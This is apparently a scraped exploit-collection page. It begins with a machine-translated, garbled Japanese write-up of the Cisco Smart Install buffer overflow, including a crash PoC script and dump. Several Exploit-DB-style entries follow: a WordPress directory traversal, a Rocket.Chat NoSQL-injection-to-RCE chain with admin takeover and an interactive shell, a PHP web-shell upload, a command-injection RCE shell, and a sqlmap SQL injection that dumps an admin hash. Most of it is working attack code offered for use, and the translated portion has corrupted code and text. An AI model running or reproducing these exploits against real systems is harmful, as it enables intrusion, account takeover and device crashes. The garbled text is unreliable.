役割:クライアントおよびオペラモード:有効または役割:show vstack configコマンド出力からのクライアント(smartinstall有効)情報は、この機能がデバイスで有効になっていることを確認します。

3. Cisco Machineでコマンドを実行して判断を下し、ポート4786を開き、SMIを使用します。

スイッチショーTCPブリーフすべて

tcblocalアドレス外国住所(州)

0344b794*.4786*。*聞いてください

0350A018*.443*。*聞いてください

03293634*.443*。*聞いてください

03292d9c*.80*。*聞いてください

03292504*.80*。*聞いてください

Cisco iOSおよびIEXソフトウェアバージョンチェック:

ルーターショーバージョン

Cisco IOSソフトウェア、C2951ソフトウェア(C2951-UniversAlk9-M)、バージョン15.5(2)T1、リリースソフトウェア(FC1)

テクニカルサポート: http://www.cisco.com/techsupport

Copyright(c)1986-2015 Cisco Systems、Inc。

Mon 22-Jun-15 09:32 by prod_rel_teamをコンパイルしました

iOS-xe-device#showバージョン

Cisco IOSソフトウェア、Catalyst L3 Switchソフトウェア(CAT3K_CAA-UNIVERSALK9-M)、バージョンDenali 16.2.1、リリースソフトウェア(FC1)

テクニカルサポート: http://www.cisco.com/techsupport

Copyright(c)1986-2016 Cisco Systems、Inc。

MCPREによるSun 27-Mar-16 21:47を編集しました

4.脆弱性が影響を受けたかどうかわからない場合は、CiscoのCisco IOSソフトウェアチェッカーを使用して検出できます。

https://tools.cisco.com/security/center/softwarechecker.x

5。次のスクリプトを使用して、対応するIPポートが実際に開いているかどうかを検出します。 Cisco SMIプロトコル

https://github.com/cisco-talos/smi_check/blob/master/smi_check.py

プロトコル機能はMSFにあります

https://github.com/rapid7/metasploit-framework/commit/c67e407c9c5cd28d555e1c2614776e05b628749d

#python smi_check.py -i targetip

[情報] TCPプローブをTargetIP:4786に送信します

[情報] Smart Installクライアント機能は、TargetIP:4786でアクティブになります

[情報] TargetIPが影響を受けます

0x04衝撃の範囲

インパクト機器:Catalyst 4500スーパーバイザーエンジン

シスコ触媒3850シリーズスイッチ

Cisco Catalyst 2960シリーズスイッチ

スマートインストールクライアントの一部を含むデバイスも影響を受ける可能性があります:Catalyst 4500スーパーバイザーエンジン

Catalyst 3850シリーズ

Catalyst 3750シリーズ

Catalyst 3650シリーズ

Catalyst 3560シリーズ

Catalyst 2960シリーズ

Catalyst 2975シリーズ

IE 2000

IE 3000

IE 3010

IE 4000

IE 4010

IE 5000

SM-ES2 SKUS

SM-ES3 SKUS

NME-16ES-1G-P

SM-X-ES3 SKUS

0x05脆弱性の確認

以下は、この脆弱性の検証のためのPOCです。

#smi_ibc_init_discovery_bof.py

ソケットをインポートします

インポート構造

OptParse Import optionParserから

#ターゲットオプションを解析します

parser=optionParser()

parser.add_option( '-t'、 ' - ターゲット'、dest='ターゲット'、help='スマートインストールクライアント'、デフォルト='192.168.1.1')parser.add_option( '-p'、 '-port'、dest='port'、type='int'、help=4786) parser.parse_args()

def Craft_tlv(t、v、t_fmt='!i'、l_fmt='!i'):

return struct.pack(t_fmt、t) + struct.pack(l_fmt、len(v)) + v

def send_packet(ソック、パケット):

sock.send(パケット)

def受信(靴下):

sock.recv()を返します

__name__=='__main __' :の場合

印刷'[*]スマートインストールクライアントに接続する'、options.target、 'port'、options.port

con=socket.socket(socket.af_inet、socket.sock_stream)

con.connect((options.target、options.port))

ペイロード='bbbb' * 44 shellcode='d' * 2048

data='a' * 36 + struct.pack( '!i'、len(payload) + len(shellcode) + 40) +ペイロード

tlv_1=craft_tlv(0x00000001、data)tlv_2=shellcode

PKT=HDR + TLV_1 + TLV_2

印刷'[*]悪意のあるパケットを送信

send_packet(con、pkt)

スイッチを攻撃するには、次のコマンドを実行します。

ホスト$ ./SMI_IBC_INIT_DISCOVERY_BOF.PY-T 192.168.1.1

スイッチでは、クラッシュメッセージを表示して再起動する必要があります。

00:10:35 UTC MON MAR 1 19933: CPUVECTOR 1200、PC=42424240の予期しない例外

-traceback=42424240

crashinfoをflash:/crashinfo_ext/crashinfo_ext_15に書き込みます

===フラッシングメッセージ(00:10:39 UTC MON MAR 1993)===buffered messages:

.

キューに掲載されたメッセージ:

Cisco IOSソフトウェア、C2960ソフトウェア(C2960-LANBASEK9-M)、バージョン12.2(55)SE11、リリースソフトウェア

(FC3)

テクニカルサポート: http://www.cisco.com/techsupport

Copyright(c)1986-2016 Cisco Systems、Inc。

ProD_REL_TEAMによってWED 17-AUG-16 13:46をコンパイルしました

命令TLBミス例外(0x1200)!

srr0=0x42424240 srr1=0x00029230 srr2=0x0152ace4 srr3=0x00029230

esr=0x00000000親愛なる=0x00000000 tsr=0x840000000 dbsr=0x00000000

CPUレジスタContext:

Vector=0x00001200 PC=0x42424240 msr=0x00029230 cr=0x33000053

LR=0x42424242 Ctr=0x014D5268 XER=0xc000006a

R0=0x42424242 R1=0x02B1B0B0 R2=0x0000000 R3=0x032D12B4

R4=0x000000B6 R5=0x0000001E R6=0xAA3BEC00 R7=0x0000014

R8=0x0000001E R9=0x00000000 R10=0x001BA800 R11=0xfffffff

R12=0x00000000 R13=0x00110000 R14=0x0131e1a8 r15=0x02b1b1a8

R16=0x02B1B128 R17=0x00000000 R18=0x0000000 R19=0x02B1B128

R20=0x02b1b128 R21=0x00000001 R22=0x02b1b128 r23=0x02b1b1a8

R24=0x00000001 R25=0x00000000 R26=0x42424242 R27=0x42424242

R28=0x42424242 R29=0x42424242 R30=0x42424242 R31=0x42424242

スタックtrace:

PC=0x42424240、sp=0x02b1b0b0

フレーム00: SP=0x42424242 PC=0x42424242

0x06脆弱性修正

#conf t

構成コマンドを入力します

ライン。 CNTL/zで終了します。

NSJ-131-6-16-C2960_7(config)#no

vstack

NSJ-131-6-16-C2960_7(config)#exit

重要なのは、この文がvstackなしです

もう一度見て、ポートがオフになっています。

#show TCPブリーフすべて

TCBローカル

住所の住所

(州)

075A0088 *.443

*。*

聞く

0759F6C8 *.443

*。*

聞く

0759ED08 *.80

*。*

聞く

0759E348 *.80

*。*

聞く

0x06脆弱性ハザード

これにより、攻撃者が影響を受けるデバイスにバッファオーバーフローを引き起こす可能性があります。これには、次の効果があります。

トリガーデバイスリロード

攻撃者がデバイスで任意のコードを実行できるようにします

影響を受けるデバイスに無限のループ再起動を負担すると、それはデバイスのクラッシュです

0x07脆弱性修正

#conf t

1行に1つの構成コマンドを入力します。 CNTL/zで終了します。

NSJ-131-6-16-C2960_7(config)#no vstack

NSJ-131-6-16-C2960_7(config)#exit

重要なのは、この文がvstackなしです

もう一度見て、ポートがオフになっています。

#show TCPブリーフすべて

TCBローカルアドレス外国住所(州)

075A0088 *.443 *。 *聞いてください

0759F6C8 *.443 *。 *聞いてください

0759ED08 *.80 *。 *聞いてください

0759E348 *.80 *。 *聞いてください

0x08参照

https://EMBEDI.com/blog/cisco-smart-install-remote-code-execution/

https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180328-smi2

https://www.anquanke.com/post/id/103122

https://mp.weixin.qq.com/s/cmyuugfmox5pk89fo_er8w

https://www.youtube.com/watch?v=ce7knk6ujukfeature=youtu.bet=99

https://www.youtube.com/watch?v=tsg5ezvudnufeature=youtu.be

HireHackking 
# Exploit Title: WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal
# Date: 05.07.2021
# Exploit Author: TheSmuggler
# Vendor Homepage: https://gotmls.net/
# Software Link: https://gotmls.net/downloads/
# Version: <= 4.20.72
# Tested on: Windows

import requests

print(requests.get("http://127.0.0.1/wp-admin/admin-ajax.php?action=duplicator_download&file=..\..\..\..\..\..\..\..\..\Windows\win.ini", headers={"User-Agent":"Chrome"}).text)
HireHackking 
# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2)
# Author: enox
# Date: 06-06-2021
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat 3.12.1 (2)
# CVE: CVE-2021-22911
# Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat
# Info : This is a faster exploit that utilizes the authenticated nosql injection to retrieve the reset token for administrator instead of performing blind nosql injection.

#!/usr/bin/python

import requests
import string
import time
import hashlib
import json
import oathtool
import argparse

parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE')
parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True)
parser.add_argument('-a', help='Administrator email', required=True)
parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True)
args = parser.parse_args()


adminmail = args.a
lowprivmail = args.u
target = args.t


def forgotpassword(email,url):
	payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}'
	headers={'content-type': 'application/json'}
	r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False)
	print("[+] Password Reset Email Sent")


def resettoken(url):
	u = url+"/api/v1/method.callAnon/getPasswordPolicy"
	headers={'content-type': 'application/json'}
	token = ""

	num = list(range(0,10))
	string_ints = [str(int) for int in num]
	characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints

	while len(token)!= 43:
		for c in characters:
			payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c)
			r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
			time.sleep(0.5)
			if 'Meteor.Error' not in r.text:
				token += c
				print(f"Got: {token}")

	print(f"[+] Got token : {token}")
	return token


def changingpassword(url,token):
	payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}'
	headers={'content-type': 'application/json'}
	r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False)
	if "error" in r.text:
		exit("[-] Wrong token")
	print("[+] Password was changed !")


def twofactor(url,email):
	# Authenticating
	sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest()
	payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}'
	headers={'content-type': 'application/json'}
	r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False)
	if "error" in r.text:
		exit("[-] Couldn't authenticate")
	data = json.loads(r.text)  
	data =(data['message'])
	userid = data[32:49]
	token = data[60:103]
	print(f"[+] Succesfully authenticated as {email}")

	# Getting 2fa code
	cookies = {'rc_uid': userid,'rc_token': token}
	headers={'X-User-Id': userid,'X-Auth-Token': token}
	payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}'
	r = requests.get(url+payload,cookies=cookies,headers=headers)
	code = r.text[46:98]
	print(f"Got the code for 2fa: {code}")
	return code

def admin_token(url,email):
	# Authenticating
	sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest()
	payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}'
	headers={'content-type': 'application/json'}
	r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False)
	if "error" in r.text:
		exit("[-] Couldn't authenticate")
	data = json.loads(r.text)  
	data =(data['message'])
	userid = data[32:49]
	token = data[60:103]
	print(f"[+] Succesfully authenticated as {email}")

	# Getting reset token for admin
	cookies = {'rc_uid': userid,'rc_token': token}
	headers={'X-User-Id': userid,'X-Auth-Token': token}
	payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.password.reset.token+})()"}'
	r = requests.get(url+payload,cookies=cookies,headers=headers)
	code = r.text[46:89]
	print(f"Got the reset token: {code}")
	return code


def changingadminpassword(url,token,code):
	payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}'
	headers={'content-type': 'application/json'}
	r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False)
	if "403" in r.text:
		exit("[-] Wrong token")

	print("[+] Admin password changed !")


def rce(url,code,cmd):
	# Authenticating
	sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest()
	headers={'content-type': 'application/json'}
	payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}'
	r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False)
	if "error" in r.text:
		exit("[-] Couldn't authenticate")
	data = json.loads(r.text)
	data =(data['message'])
	userid = data[32:49]
	token = data[60:103]
	print("[+] Succesfully authenticated as administrator")

	# Creating Integration
	payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}'
	cookies = {'rc_uid': userid,'rc_token': token}
	headers = {'X-User-Id': userid,'X-Auth-Token': token}
	r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload)
	data = r.text
	data = data.split(',')
	token = data[12]
	token = token[9:57]
	_id = data[18]
	_id = _id[7:24]

	# Triggering RCE
	u = url + '/hooks/' + _id + '/' +token
	r = requests.get(u)
	print(r.text)

############################################################


# Getting Low Priv user
print(f"[+] Resetting {lowprivmail} password")
## Sending Reset Mail
forgotpassword(lowprivmail,target)

## Getting reset token through blind nosql injection
token = resettoken(target)

## Changing Password
changingpassword(target,token)


# Privilege Escalation to admin
## Getting secret for 2fa
secret = twofactor(target,lowprivmail)


## Sending Reset mail
print(f"[+] Resetting {adminmail} password")
forgotpassword(adminmail,target)

## Getting admin reset token through nosql injection authenticated
token = admin_token(target,lowprivmail)


## Resetting Password
code = oathtool.generate_otp(secret)
changingadminpassword(target,token,code)

## Authenticating and triggering rce

while True:
	cmd = input("CMD:> ")
	code = oathtool.generate_otp(secret)
	rce(target,code,cmd)
HireHackking 
# Exploit Title: Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution
# Date: 2021-07-06
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
# Version: 1.0
# Tested on: Windows 10, XAMPP


###########
# PoC 1:  #
###########

Request:
========

POST /osms/Execute/ExAddProduct.php HTTP/1.1
Host: localhost
Content-Length: 2160
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBZWMUliFtu0otJ0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/osms/AddNewProduct.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=6i2a5u327llvco5kgglbalhdn0
Connection: close

------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductName"

camera
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="BrandName"

soskod
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductPrice"

12
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Quantity"

1
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="TotalPrice"

12
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="DisplaySize"

15
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="OperatingSystem"

windows
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Processor"

4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="InternalMemory"

4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="RAM"

4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="CameraDescription"

lens
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="BatteryLife"

3300
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Weight"

500
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Model"

AIG34
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Dimension"

5 inch
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ASIN"

9867638
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductImage"; filename="rev.php"
Content-Type: application/octet-stream

<?php echo "result: ";system($_GET['rev']); ?>
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="date2"

2020-06-03
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Description"

accept
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="_wysihtml5_mode"

1
------WebKitFormBoundaryIBZWMUliFtu0otJ0--



###########
# PoC 2:  #
###########

Request:
========

POST /osms/Execute/ExChangePicture.php HTTP/1.1
Host: localhost
Content-Length: 463
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Dm8cGBqGNansHqI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/osms/UserProfile.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=4nksm1jl45bfbbd5ovn0fpi594
Connection: close

------WebKitFormBoundary4Dm8cGBqGNansHqI
Content-Disposition: form-data; name="IDUser"

6
------WebKitFormBoundary4Dm8cGBqGNansHqI
Content-Disposition: form-data; name="Image"; filename="rev.php"
Content-Type: application/octet-stream

<?php echo "output: ";system($_GET['rev']); ?>
------WebKitFormBoundary4Dm8cGBqGNansHqI--



###########
# Access: #
###########

# Webshell access via:
PoC 1: http://localhost/osms/assets/img/Product_Uploaded/rev.php?rev=whoami
PoC 2: http://localhost/osms/assets/img/Profile_Uploaded/rev.php?rev=whoami

# Output:
result: windows10\user
HireHackking 
# Exploit Title: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)
# Date: 07.07.2021
# Exploit Author: Beren Kuday GORUN
# Vendor Homepage: https://wordpress.org/plugins/plainview-activity-monitor/
# Software Link: https://www.exploit-db.com/apps/2e1f384e5e49ab1d5fbf9eedf64c9a15-plainview-activity-monitor.20161228.zip
# Version: 20161228 and possibly prior
# Fixed version: 20180826
# CVE : CVE-2018-15877

"""
-------------------------
Usage:
┌──(root@kali)-[~/tools]
└─# python3 WordPress-Activity-Monitor-RCE.py
What's your target IP?
192.168.101.28
What's your username?
mark
What's your password?
password123
[*] Please wait...
[*] Perfect! 
www-data@192.168.101.28  whoami
www-data
www-data@192.168.101.28  pwd
/var/www/html/wp-admin
www-data@192.168.101.28  id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
"""

import requests
from bs4 import BeautifulSoup

def exploit(whoami, ip):
	while 1:
		cmd = input(whoami+"@"+ip+"  ")
		url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'
		payload = "google.com.tr | " + cmd
		data = {'ip': payload , 'lookup' : 'lookup' }
		x = requests.post(url, data = data, cookies=getCookie(ip))
		html_doc = x.text.split("<p>Output from dig: </p>")[1]
		soup = BeautifulSoup(html_doc, 'html.parser')
		print(soup.p.text)

def poc(ip):
	url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'
	myobj = {'ip': 'google.fr | whoami', 'lookup' : 'lookup' }
	x = requests.post(url, data = myobj, cookies=getCookie(ip))
	html_doc = x.text.split("<p>Output from dig: </p>")[1]
	soup = BeautifulSoup(html_doc, 'html.parser')
	print("[*] Perfect! ")
	exploit(soup.p.text, ip)

def getCookie(ip):
	url = 'http://' + ip + '/wp-login.php'
	#log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&testcookie=1
	data = {'log':username, 'pwd':password, 'wp-submit':'Log In', 'testcookie':'1'}
	x = requests.post(url, data = data)
	cookies = {}
	cookie = str(x.headers["Set-Cookie"])

	for i in cookie.split():
		if(i.find("wordpress") != -1 and i.find("=") != -1):
			cookies[i.split("=")[0]] = i.split("=")[1][:len(i.split("=")[1])-1]
	return cookies

ip = input("What's your target IP?\n")
username = input("What's your username?\n")
password = input("What's your password?\n")
print("[*] Please wait...")
poc(ip)
HireHackking 
# Exploit Title: Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection
# Date: 2021-07-07
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scheduler.zip
# Version: 1.0
# Tested on: Windows 10, XAMPP


################
# Description  #
################

The admin panel login can be assessed at http://{ip}/scheduler/admin/login.php. The username parameter is vulnerable to time-based SQL injection.
Upon successful dumping the admin password hash, we can decrypt and obtain the plain-text password. Hence, we could authenticate as Administrator.


###########
# PoC     #
###########

Run sqlmap to dump username and password:

$ sqlmap -u "http://localhost/scheduler/classes/Login.php?f=login" --data="username=admin&password=blabla" --cookie="PHPSESSID=n3to3djqetf42c2e7l257kspi5" --batch --answers="crack=N,dict=N,continue=Y,quit=N" -D scheduler -T users -C username,password --dump


###########
# Output  #
###########

Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 7551 FROM (SELECT(SLEEP(5)))QOUn) AND 'MOUZ'='MOUZ&password=blabla
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

web server operating system: Windows
web application technology: PHP 5.6.24, Apache 2.4.23
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
current database: 'scheduler'

Database: scheduler
Table: users
[1 entry]
+----------+----------------------------------+
| username | password                         |
+----------+----------------------------------+
| admin    | 0192023a7bbd73250516f069df18b500 |
+----------+----------------------------------+


The password is based on PHP md5() function. So, MD5 reverse for 0192023a7bbd73250516f069df18b500 is admin123